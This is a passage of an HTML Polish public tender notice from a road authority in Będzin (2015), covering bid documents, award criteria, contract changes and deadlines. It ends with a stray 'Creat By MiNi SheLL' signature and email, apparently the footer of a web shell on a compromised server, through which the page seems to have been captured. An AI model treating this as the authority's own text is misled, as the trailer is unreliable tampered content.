ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, a opisanych w punktach 2.2 do 2.4 rozdziału XI SIWZ (opis sposobu dokonania oceny spełniania warunków), polega na zasobach innych podmiotów na zasadach określonych powyżej w punkcie 4 (zgodnie z art. 26 ust. 2b Ustawy), a podmioty te będą brały udział w realizacji zamówienia, wymagane jest przedłożenie w odniesieniu do tych podmiotów dokumentów, o których mowa w punkcie 1 (od 1.1 do 1.2) rozdziału XI SIWZ.
2. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ. Kosztorysy ofertowe, sporządzone zgodnie z przedmiarami robót z załącznika nr 8 do SIWZ. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź  kopii, potwierdzonej za zgodność z oryginałem notarialnie. W przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu. W przypadku wniesienia wadium w postaci niepieniężnej, należy dołączyć do oferty oryginał dokumentu potwierdzającego wniesienie wadium - zgodnie z punktem 2.1. rozdz. XV SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres udzielonej gwarancji - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik Nr 7 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip-pzd.powiat.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku 42-582 Rogoźnik, ul. Węgroda 59  cena 200 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2015 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku 42-582 Rogoźnik, ul. Węgroda 59 , I piętro, pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com